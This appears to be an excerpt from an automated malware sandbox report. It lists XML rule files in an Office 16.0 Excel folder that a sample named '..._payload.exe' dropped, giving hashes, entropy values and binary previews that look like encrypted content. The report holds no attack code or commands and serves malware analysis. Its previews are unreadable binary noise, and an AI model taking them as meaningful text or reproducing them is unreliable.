                                                                                                                          Preview:<?xml.WX.8.@i\...P.....5.F.........04..B~...0....q'.4..(...c......g7~..f.a.......9..K..B....{......G5o.D.u.7G....b.jfD.(...........'..'.xD...<.k(..<..U.....[...a=....u..^...cY>g..8 F...l0../l6.^..X9Z..V...(Vv..KD.2...[N;\..o......(+ ...Q.....Zg6}..b...S...@..Y._4._%.O.F&.H.K.*GL..`./.v...'..lz..Lz6x.....;.h^.|_.JD$.2..t...}....C..8.*N![..}j.B...].....l...mS?....a.B...f....r.xG|...w....b.$7@.7..p..bu.@.P.......:"|#..`'"B...i.Y..+.E#..'W.Yz....6ak...I....-.s=yr..GW?.W.sl._......LP82.......,3W.`..]..-.B'.}..{{n;.J0.V.?=6.O...;v..9G........U...2.0W.0=Z....z..\/`.RZ.O...%....%.~A?*c.4rO...3..\.<.u.L...pqz.=..9"...J...xD...e.9..Y.L..@..:..nh.$pq..(.f#=.h.*.x..,,E...TWI.{ .....u..^#.Mx.Q.+.....JL........H.....:...:..e(. .S......#.m7..j.#.G..q.2q......k..9D...7k.......{.#*Z......+....gc+mL.c....5....+.....D..oo.u%..w.<,DtZ.h[.F.M....1"./.G+..h.J..0..36.Zs..z.:U.`c,.8.1.2....:....Bm.i.Nva.FjVK....'.9s..QG........_.'..?..Of..ZbL...S^.AJ.h..W...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370012v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):732
                                                                                                                          Entropy (8bit):7.699725709458977
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:33mgkwgvosfjY6nmSYP+bqfBOomU8Nmyzg2r6q0Ktc7v9o3SG6+4Cy7Zq5bTciik:HmHZos86nmSu+aL80yE2e6u1oNNy7IbD
                                                                                                                          MD5:2F4EE8F98122F73EDECB5E27EF16E492
                                                                                                                          SHA1:8B3BDDC057434B6CB60579E4FD3CD78073C96A07
                                                                                                                          SHA-256:B4E5E4B9952E5E787B46811C5023AC0EA1E28C106652B9DF259BB991C8DF9AD8
                                                                                                                          SHA-512:E81043739626568B0508522379596781AC4FE7D430B98A7AEA4CF5574A136A796ECB6F46F3131A91FE2856332D922ACFF282193D352D9A92D66CFCAE0DF0A513
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.m.x$ .\1.....<..I..:.5<....Y..F.e..").........0..K\...s@o..E....c.....*=.F..7.KEg...m;.*."g....e.....D.....6..t.%:..R.o..<]&.s..H.{.h....T.n>.....L....a#....et..h.9..\..n..7...X-?G2.I.8S1.&.c....,...0?..m;.S:G.h..{..|H....8..G.c..7.X.1e.{.?....F/L[;...ds..z."..,...I....Y.!.-%.o..2..-.ll..K...+BX..^.IW.&.J..c..V0.=..=+..g?..i...OV.....Y.....U..L;.k....+-P..b....iP...&`..ki........C.(..}.*@.g...L...cM.>9...'..,.:..R#....u.e....9'......&K.2...mi!n..).0.2I...UP.j.C~.)..r..z. .@.C.%..E..7c..2]U..P.tR...(.?j.l...!..v.`..|..Y),......[`..N.......-6&..%....,.m9@..'....oQp...`.q..d..?).B.d.....j.2u.....sa$.;..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule390004v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3616
                                                                                                                          Entropy (8bit):7.939679571626899
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:CWwhGwbDyhpQ8z8OXhcLjm6/X0OiIbkJkXf:CWuGwbDyheYXK6UHimkJkv
                                                                                                                          MD5:9F3B47306737D724039A56946CC5C3E7
                                                                                                                          SHA1:AFD1F2A83E90E45BC221104B899DDD740F8E3BC5
                                                                                                                          SHA-256:545C1B75D0BF06BA8C0740E004332191ADFC0B551AB8D4DE8108C062A97104EE
                                                                                                                          SHA-512:90488792DEA24C6CC05C6F4234CBA5DA8D26C8F660A09222FFAF4458528A30C45CC502652B12DF3E334CBAC07BFC51FE80C8E483C39B5CB26E90E3B780C9B6B4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml......~1...Ahx..U.:...K.....0.b.....7O.....).l. Di#....5Jqu.:...$..5V..B:..Y..f...xF3g...3.R.GA0D..."..z].......3."........%p.....C.......a...t...D.z.z..".......j...k...TTB..B.P{9..(.+8..,...~.$.....-*..&4n.1..cjr9#+.!.]....N.^..l.o#..4..%X.....%.9,....<..d4.o....N/Ax..u......]./..^..=.>.0...xgf.SX.J..CF5...r.\...=h..}..JJ.........Lf's.wIO.h...."|.......5.o.)4..V.F...}X.MD..%....C.....&..p>...p...Lo........G...@3..n....I.%.".*]t$d. ..j.{its$...li..|.....M.|=oY..i..~Ns}.]J......p.ak.+.......7sX!J.tm..p.6.X......V-<#U.5.$Q.L.A:.B.....B..j.T.Kp7;n../2m.OqD..]w-z...Y..Xc.y...+8a\........W.s1:^o.....E)P.'.......;;.....g..*.^...g.............X...[..X(c.5....7.q..9;.V.2`.C.....Syq.V..x&.V....r7..T.>sJ8A.t.c..m.s..4<......Y}.0.........`.......U.,..-NG.....s..il+7....5Y.{..U....P.ho$..8.\x7.`.....{0...W.jf.h..K.c1..z..s.....a.&LY..........G.r.m....Q..s..1.l-......c.H...0..A.....l*gx0...&.O.Yx...1...95. >f....@.dV...A...Cr..1..ijM...sO$z.?..;..X....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule390005v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):783
                                                                                                                          Entropy (8bit):7.702760867557183
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xjIsKOEOmBJW0+lR3DgDt+EAnQIVnAH/LpwC7xPp34kq92NWeiTYrV1zbYrWBp0b:xD8LQ0+xTEp7hO192NGTYxlcaB8bD
                                                                                                                          MD5:C43E71A486E1D08600E849788C773DCD
                                                                                                                          SHA1:7D458A797BAEB9E094BDB86110C9BBEFA5AEE7E9
                                                                                                                          SHA-256:0EEBA87CDF63FF5BB7CF708A29A188EC8E9D8001A87DB3005161CC51EB78620B
                                                                                                                          SHA-512:81C96452ACEDE97D400D7DCF83949DCC23A9ADE89C305A6A3D4CB0257C4CD1113FA6557EC637CD25A5929D6210F0B23DEE9AFEECC1665E0AA54FA20EAF3C3ADC
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.H)yL.i*....n.M...x.{0...2.p..=n..H4H..y.roba.5.wg.rH._...";...8v.H..D..45....F.K.......]..$......2......b.$/+.l..a@...f4.A.vY......=._:.s-.....R-..G.q.... ..FQ%u._..bb.......N.q.'......9..U.>>..V..(..k.L@.6..%e.C.0nH]H..4..4U...~....8.,0.h-J^T.".F......n4W*yHA.D.&W....V{.K.(.l.oy.n./....dy..WC....C..@.m..J/.,.E....FS..9Z.L......%./....g..".=.2..T>C...Dk....N.q.....M..l .BA.].8.v..]E...P]....n.A.x.....v...j49.fG....v.S..E...s=......A.-..!..J...D...<...Mje...m.....e..X.h..wD.4.w........C.H.....6...A....v....-v.uF%`...P.#.8D...<.....b.Y..........X..qC..o.{.....h....\..i....nh.*.#....H+..b..v...i7....E..:K...EtU..\.@.8..LZ~5.P.......w^....p..)..&...lJ....^..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440000v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2331
                                                                                                                          Entropy (8bit):7.928961634947765
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:dd6adq6EHgfjJcBzfPuyrQNwk7EaXUcTK6pI5aDshk6ye52BSV9LRxDJYGA2KD:nNjmkYMwuEsK6eoQv2BMLLJYGI
                                                                                                                          MD5:4F2C64D05EBF39CFF905BC0A458243DE
                                                                                                                          SHA1:021D45ED25CE1FF1F20727CAE6CCF82FAF743352
                                                                                                                          SHA-256:20ED6D43C68F15862EA7B5BA559D098655B2D4AE54F8C30F4E82C349F78587CE
                                                                                                                          SHA-512:427AD2C415D121BBDA9B4557AF2AF8EB3E0B5F3607A0C24FCE9BB5C035DC3514D8B1F8DED18CBCC296E2BD6D0D8E66879BCD0045001D23EFEC791AA1543B3876
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlU.-..:..k. ......../."......Z(b..].".T~C>..?g.Q]fwH.Qu(.Q.\\x.<.......^.N.O...\.W.....I....sZ5...M.A..5.<qv...l5..=..(.v.#.Px...#...:A....6..p^..yKx.#....IPJ..e4N.I....,;..fi..W..H.q.k......./....v.4]..yT.......-..@.......w|.....lK8..?,-..E..b#..k.o .......W.......IQU...?=..6....N;.....[...u.....]m...UE{.+...1g!I....Y.,.`...P..6u= .Gb!q..<.t.e\.......>.K.g......>F..`..._zy....5......S....v..D.-t........uZ....+.h...cL........lo.;..w.........U..2D.p..X...#.`.Wby.g....u....O...Y.K.i....T.....CA6k..7....;.e...3.#....+..."ja..y.bJ.......|.V.H....+.9.......YW..`-.$W..jg...K_ct..6.kU..wt..c.Box;..X........).k..i.t.Y4r...\.I....-AX.0j.^5{S..t...X.*.=.?aK..u.vg.tkai...~.f.i..C.4."..%....C..ws...3t....:.........3!^i...._...1.._...:9.j..s..*.)`4{L....P. .)a....(.}}...4.]...v.M...Q/K.?..$.jN.....f'.\..0d.t0..a..Ir.....M6..>SV.m@{;..h......qU...$..#.g.H.3.R.v...<.^`....:92.t.].....v.).. ...:.S...VT~..Pk.$...[D..U*..9..z ."BI..>.%.L.2.a.....%..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):44492
                                                                                                                          Entropy (8bit):7.996177968790697
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:yVNGAtZu9shmUH2L7FnKZkPzfVVEA9VtETRcGbwCnHribK8vN/RbAWpdWsXo4av:Mi9s547dlPt9VST6Gb5nmemJbAWysGv
                                                                                                                          MD5:9057B58E2B2239B552B268050B6ED3E5
                                                                                                                          SHA1:65B5ED181AE4E42ADF570323C5940B6B8449A16F
                                                                                                                          SHA-256:00D2C78C3EB6A58EC401DB268944BF89DE82C4088FDFD021BD540778305C527F
                                                                                                                          SHA-512:6C161DC51D8D967218B59E5F20F07C04CB57B4D03451AC47AE0876F6898A16602CA9D89F26766FE5B57FF135BC054D9E450172A01EFFE5C97FDBBB2AB9881847
                                                                                                                          Malicious:true
                                                                                                                          Preview:<?xml.#W..E...4|..GZ]MQ;v:5.b..~...<Y|...r..:..!...fR.x..E...G.Gmo.A{$../K.l...o.a.b.q....7..z..e.....?>|*)0.E..p..c..c5.....K0...#...S......[....n.:>...Qc...~5..|g...q#OWu.`.....F.<WeE.N..|Ya:..J..,.].~........*q#.O..;F....E...]4)..=..__..j zC.u...x......m....8y1...c;..+5t..B.W.3.l..%..R..2f..nR..{j).f...n.x.+.eT.. ....4..=.....||....bv........5..k3...Y.";.?h-L..k.m.1&K...(. w.T[G'.[.|o.j.m...!.e..u..z].lU......t......94..5'rq9.^.\_.V...oFq1.S+._...P.p.........!.~8..g..m.%.....U_...a$./../.Yc..Yp..jt..\.....<,..8D.1!U..$...'..'>5.'...R'..>.'Wv...s.o-a<+eY'ed>......xH8.....f.K...g.H-Pw....K.}...+.I;..Uv..9.p.9.=+g.4.'.9..G.l~z....\i..X0..-r.....A...~........L..)!.o..%2M...n?Y.t.%j9(w..Lt2.u....J*.;...q...;.q...bH...U..PA....@...._.Q....:ki..YaM..D..h....P._..6..PefK..v].P.Q. .....xB)o...F]...*......>..T.O}...-S..dW.Z.'j.{ZoX.l^.\:....}H..".Yz....,.rl..JL....d....a.....I.....}.s.+v?[~.M@82r..k.d.n.-|.6k.._.X.....\....;S....U..6..h.-....3..[..`gC

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440004v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2338
                                                                                                                          Entropy (8bit):7.924125888790803
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:7P7BASgadCG3LIcy9uwQbLH4u2uS4k9wfk4YjOyrVIByGdFjb0y6D:HZgECG3LpxwQbLH4uMX9wfaOyrg1d1b8
                                                                                                                          MD5:AF46A1C5C14754D9A442DE3F7B509F98
                                                                                                                          SHA1:A1429EDF3FD349D1FFCCF6F1EFA191DC79DADDD7
                                                                                                                          SHA-256:6294C97326AE57A148E7BCF87BE15500C9A6FD69F946E1870CFC25212052AC14
                                                                                                                          SHA-512:3370EE4F612CFD4685F8F5E494135D9360DEB789C26ED41612A867D0E2978DE1E1395EB598E957BCA69D1B8EE345420798C887A1722C44E7C9F7EA1EDE5E928A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.uT..m.+W....e..j....]@...p{.<.......m......qqu<.R.F...E..............#7S{.."LRj8.V...:.y...Y......z..B.</0 .;Y....\...W....Rdz.m..k.. .a....2.....r....P..o.F~..qY... l.... ....9.\d..0O.k..`!Z.T....):r.~.M.R*;0.Q6.7[.....=o....9.c~..EE.|LX..N...."V8....0....A..?;.^./.m...6.@dt...7..6...p.r..N.c...!..J...5.tL....;.oO.i..1.9..A-N......nX.5..B]..8~....L.giMQ..C.ev...G.j.4t.;......]..2.f.I..;o$...o...Z.....c:.M4+.....Q....5..;.;...&...^f.I=.....S..[.g... .J.%N.3._S...mP.rcd.p...l......q.e.znt+..Y.\/...~...J.Y..../.Gk:..`...0.H......s.<2&b.X .l.&....}..#u...Uz../.....{...{}.oS...6t]i...b...c....`..\TU.K...Q.D..U.P........h.....-.G.....Pt;.a..|{&...m!..:.;.X.....y7.q.....3.I..S[..l.i....W.wb'..g.....W.7qo#....z0.{+....Pi\_....Q...Zm....d[.#..........}.>k..E.g..\Q.>.HeG0.f....M...)_.....lC.Jbq+.M%.<.Y...u..[.y.w.q.>.[....I..e#....I.b..lg.r.H.s*.q.e......0k.s.>.nyz.F..}.......7......h.|."..."3.,G8.....eE.,!>...Z..M........;DQR....Iq..JRr.V3...q.....t.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440005v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2320
                                                                                                                          Entropy (8bit):7.915978857098475
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:DNDFKz9RCx4VzNgcgvOHBGvujTH7BfyV4n/8K3oVTM/cgJ/hD:JDYu4VRgq77wV4n/8CATYx/J
                                                                                                                          MD5:300AA111E2314D1365127094F055A0BD
                                                                                                                          SHA1:31F72B508F4A1BA3D0A63431A05D4C4AE905FC50
                                                                                                                          SHA-256:156A36992FDE3417F7CBD765C87F0BE146875EA8645A030E3E8DD6F37AD19CB4
                                                                                                                          SHA-512:36DBB28A5F25DA0E4F1208D93C390E5E09603E015A9F33D7CC7C7E14491D7145B026FB9D5B98840B84CFEC48D2EA01AEE95B277B57DE91F82254647BFB6A6F76
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlsp.4j...........H.%.4...|hx..0._....mt...].R......W..*.fH.['"...kl.4.K.B....n*)..Os...d..W!......$'..V..8..t..!...I...~L.p.t.m<7.O.I...E"....{..*..n. m...*.F...N.x.q.+.'.....l....\.....wK.Q.....@j+.|..H(K.`p.+..*Lz".!..N ....`.....0......W.Mt..%6.F.$...1..)..z..k.Y....#Q6d....l.3G..f.w=....s..z....@..WF.P..? J.9~.CN.YX$...3t..........p^...-.....k..3H...A`.r[.C...a!b..o1B..g.._.Z....VJ..*.,s)........Ke..$#.0.-.W..(......g..d7..<...".P...H.....MB...e.....dL..+.....;'E..g.,..V...W.m.I..$A8..(.{ ..[..W..oHQ..u.g9....w.@"T.`q.G.aG.._..U+..H.)....5.........VR.6zF%X....*]....v...U@..t...M..Q.3..D#{..2....G..S.n......;.X.0ZR..0....v_2.x.UZ.f..^.. .4......P...0........s..7.....Hm-.1..Pc.7. h..._.k......l.-....V..hX.D...q....4..dWc..3G..1.HF.8.k...E...J.S.;....1......y.E...C5...%N..;.......O+..5..wP.{6...!^.8.......P>..Y..x...4.2.DD.h...,]..Ts .x?.DQ...S...:.Te&..?.K....9.O.+....J.sy..*...o.f....5]f.y_..`......2.t8

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):41208
                                                                                                                          Entropy (8bit):7.995335732461531
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:8fzXWDZbFIJSEdBZgNuN9t6BG9dG0HPF/FhyDmFpAzqLsSDv05:8fzGDjE3ZgNubt6c9d7tFhy6fAysSDW
                                                                                                                          MD5:16CCFF12209EC5276E82B36A3ACE528A
                                                                                                                          SHA1:24B7171B24C24FFC091142FEC5784E3BA06EF54F
                                                                                                                          SHA-256:0DCE58D814CC94E342C99D8467AA7CBDB57148A5893A1E59A0632E312A7978F8
                                                                                                                          SHA-512:0C41256093BBC8DFF9C493C81CA9516A6E4BA371EFFEBAF4F74C2146C5F9A1BB2295EABC23047596ECA8192F645D55D65D7FE93F7BD4BAD9014E8E14BFFF7CA7
                                                                                                                          Malicious:true
                                                                                                                          Preview:<?xml{....B{-!.....!\f.=kb.]......{....."lg>e=.*. ....|...K.u7$u..2.[....0.;...h:.....D.>`!.g.uY.X..dU...,.7....c6..A.9.gE.........d.{.;~1....%$..VY...MbY..FeD{....r.e...[.@.I.D..3 m.....^.D........}..@.a2<..f........F...X...s...Y.8.Fo...3.eJ.3..~7......(..Q.. .X.C.[..V...!q.<.....2..j.Z..FW..._&...3?.n,\U.8z]w.J..g<'T..?GT[f.y....@9...>..NBmf..)b[U....a.T..1.5..01{.,........#..Jp*|..*.hj.%....."....3.d........*....C.)..8.!.....L.7S'.k..%....~....5m~z;...!AN..1.n...'/"O:..7.E>.Ug#..`..Y.K~...=Ko....\.0.<!.j_..R.....^.....2...Y.Q...}Q.b.......+/.Z%[..0.....D...'e2.E..\h...B.....b..).....n..O..j.l.x......@..9`-.D.D(...z...m.8....Q.......}2..B.....2.......Y.E.R..{!..1;q...=...zoeU..N.......~3....#....w..*.C..Y....!t....7..D....u....K}*.Z.....,...j9._.....G5...;..^.Vr...,nK..~n....RIf.+".qH&%..T...}...;..<.]..)E(-../XRT"A.r..J6.j+N......o~?6.....`9..J.H..C.79..=.x.Wb.D^.u....F....{"....&...:....^..Zt.........R....k..;]%...%..@p...\.F.7.q~.Mz..A

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule460008v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):785
                                                                                                                          Entropy (8bit):7.717749306735496
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2SvnHP3NMSNokEi+ocAxVmNqL02mkm7bD:lPHP9MSNp+fWmgLV+D
                                                                                                                          MD5:EE2C4272FEED41E5724509AA8086491F
                                                                                                                          SHA1:5CE6F5F884C453AF2B497D36810B7C70593A7889
                                                                                                                          SHA-256:439E66DF24B76CF120A0D5960F1267699E7C648DF901CD4CE3297C53847202BE
                                                                                                                          SHA-512:AE247037B98CF192C8A45559E22F0D6E7734674088DA2432E91315BCF45A087B05B4FAA3DF80CA780C2C8ECE444DB7BDC150198DC74E2474D73E31074FE3388F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...e...y....s.3...M..P....4I..,~.?.H[R..\..1.I..v^.G...P.6..*L....gve.'....8}v..7...o.}..H..m..8..S!.9..$.....`..lO...T..:.E...*.;.....Y..9..Un.\?5JCM6....q.'.:@.J.38..."..[~...m...T.>.&S..1.\p....DiG..P...g.+.K......Q.K.....%9I.^.rx.....r....h..`.z.t......o.n..$..x....I.....{...1.PV%h..Jh.g,...f.7L..I.....^[..W.....^.?.../.@4.<W^+s.b.~...@...@3...*.L[....}-;8>.Z.x..L.....x.Y...9....T.....xx..t......,.,.[iA.tH5Q.).......J.....~.xe....z1,o.[A.]Yt`..s.....7.7.M...V.........q!:o.6N..C..v.<8..L......%3:..*.fV.....W4...E.......bh....'..............[....K2.8..]..P....j\Z}ws.l.^I..c......p....O..)B".st(*...*.f.vN[U.8....q.3.Y...W?..(.{-.H.4.a.....Ek.......S..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule460009v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):752
                                                                                                                          Entropy (8bit):7.689258729737208
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:QOYvwgIiadj7n1lhAhxTe1ILHIrTPcm0UHzHk5d6DgCoqdc2GT9sj6njnq5bTciD:QzIiaB71UxTeq6EmtLWVHqmC6njqbD
                                                                                                                          MD5:8CE09A1C623BCBACF70EC3721567EB4D
                                                                                                                          SHA1:4D791EAE8C40950B7E7AE82A78516F888061F510
                                                                                                                          SHA-256:A3724302E2FC6117786F1A1C5FA6CCC3742701A8B9ED15E2317875F935000FD3
                                                                                                                          SHA-512:3999B1F3A1A1CE3A534B47BD2E9868D4FBF44DF0EE6E6B51A23BB8D00E3F4502362F82473133BD57E0E6320448F942DCBE3860CD938B2C18FD22F211D329DFF5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml-.TT..&.Y...*..Y.z.j .F...<.p....U.K...yTTt..X{..?.1y.!.g.qp...*..d|...n.+....@j.i.OA'...g.M..jb....L..nc.5.I.@.P.......:..%.......~*...+..o.}.V..(..Y.U..XGM.8t...Q.0.itY..z.I...U.Q.2.8.M........W.U...h.6....".Z.!....=.V.A`t...)E..q....G0v.q..0....>...%;d.; u..y.....l..:g...m..|....+.p.....cu......$.&..M.W.{..=.x<..U..jA...-V!.0t....N..|..y..q.. ......]....`BI=.Gk..... .v......(q?.i"..O@.8@.Zb..a*L....It'...qy.....u$..j..(..K...ek.S.U.o.-.i..!."..-.2....<.......DH.....'C.|c.z6.{0.M.2..*.}.a{.......x%...7T..>.'...$D{...{l c....1W...+&Jt.!.d.....'i.9d...S$....4...=..;...y.r.ya. JXG.Y...Bp...u.N.....A.d.:..%....p.......|.^94J....W..VphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490002v13.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1428
                                                                                                                          Entropy (8bit):7.855098770849484
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:o25ndLFwq5MeYs+yfYDZoaPoNycW3iPY6MqNXI9XF/UbWPEnbGGbD:B5n7ZKsYDWaPsyP3ol59I5GnxD
                                                                                                                          MD5:69FAFE93438AFD12693CDC0CDD1CADF3
                                                                                                                          SHA1:D809844DF92E1A4C4F081C829D83BC7C70DC1F36
                                                                                                                          SHA-256:70C0BD59CE437FD07CB3773924CC3C3D5DA0E784E4A5612BF9BE6F4F240A1FC0
                                                                                                                          SHA-512:498175392E223093F67B9BACC0E32B91224841FEA866F89F8DEEB16CE009DB19C68DEA4004D68ED42F8E144BEDFE1453F18C0B73EDFC3ECFCA38EE6916E37451
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..:..h...!.W ..~.a...F.V}..m-.L@o.Z.}.xE..gS..Z.J`-...&.wn.M...4Z...e.-.Rjm.wz......o.M....D.[..07G.I...^..yM.d.7...k...U...,{..h..:NP..A.J.....X.......u.F....h....uso6...d...uG..^.....M`N...F....H,,...\.....$...X[..........s.....>P...v..x.)..@...h..b3nq..\....@jmx3....y.X.h...&."f="..2.g.z..7...g..........4.].....n.x..\....!....J.../|.......!9.x.y.np....Z..1. .....nt..p.~&.:p.2.H...8j#.*....m.=a...`.J....YE.O..\6&............+.r..Y.Z..y....`j><K.[....F0$.?.v....m..ezf......."N!....&UU.lt>+5B....Z.....v...(.......<..'...F}.<.d..u....rH827I.f."..\XC..I.........E.B:U........#..[..R.E.5.F.r.m......2UW...uhV..1.\|.......Q.0.'..3f0u0.mq......J.&...Z.Nr...*..%.8.z.6h. ....P...l(.W'C.......6.....9.8".....1..~.g.../MQ..[...}c......n.wI<.....dVn.z.!^....../)...!.....W+I;.?{...T5.%<&duIe\.(z..+b.2..........z`............e..5.(l...r.G09...'..E.b.....;..m8sTx.......1i..qp/q33.onghv.6.N=.Ni.d5Y..;.d...........q....a-..v..T-t.....W....../.+&.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490003v7.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):978
                                                                                                                          Entropy (8bit):7.774519911098803
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ovFegl7UO6N13knuIijq6svkNyvplm7BLPkxHR2mG7A8UObD:hgl7UOFuIHm8plf7G7fD
                                                                                                                          MD5:ACEC9DD8964FDE6887896298CC9CB48D
                                                                                                                          SHA1:6C09023E7B41933476C3EF6CDA9F5CA51783A336
                                                                                                                          SHA-256:8EE14E57C2BF3CFEE852A81C0D1CF069BC829CDBD0E93EC5658C0953F6850373
                                                                                                                          SHA-512:D34FFFADC91FA36308DCE15F34560FC32DF848A28F8580A1E024301AA33A07AFBADA6716A7E04877B6536C95B8E1B59C4F92E0A78B0EA94AC284D46A8B7E4B44
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.c.c;..t.."1..7.U^......)....u.x...T....7.(.....#..Z....9W{.X.t.t..t..0..$lrW..Y&6E8...\.%.W..[.^n..2...k...h.4`.~/.....k.C:...%..B......Q..YP.2_....^.b..w....D@G,g...C....c.@....r......rX).w.OY.;!Z.L..q.D....D....#^.....8.......~n......Y.t=....`U...7Ub..e....W.H.z.i).Q...x....=a.UdFf:...h...g....L..e.{...$d...#z#F.....!.3+.jxugZw.d..rN.|..6.^.z.>.T.a...Q ..(....z._.F.x.....F..o.*pr..H.......Ez/.YMh...2R.V..eT......P. .U.....K!...>$D...=.X...7.....P.(.W*.7./.L....mI..... ..<+.....5.[...!...<S..dk.:..b..=2. .7...:fE..9....$...~..l......j...J.hE..Q.g...^F.\+!....z..b..C3wBS.=K.:..K..............(=6.....p^.1..P..,...3.......s..Y...>...',..Ss....0..>.`!.......{.X/...../....6.e..x.3E.y.{r./FI..r?B.2...!......<1.<..gPC.i..v.Z...I........^l_.9........*I.^..r......=......S.......(.R.Q..m".1.`..^?F.2x(..*....w.i...^...E...R.....[..|..96@.o.l..g.W.5phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490004v5.xml

                                                                                                                          Download File
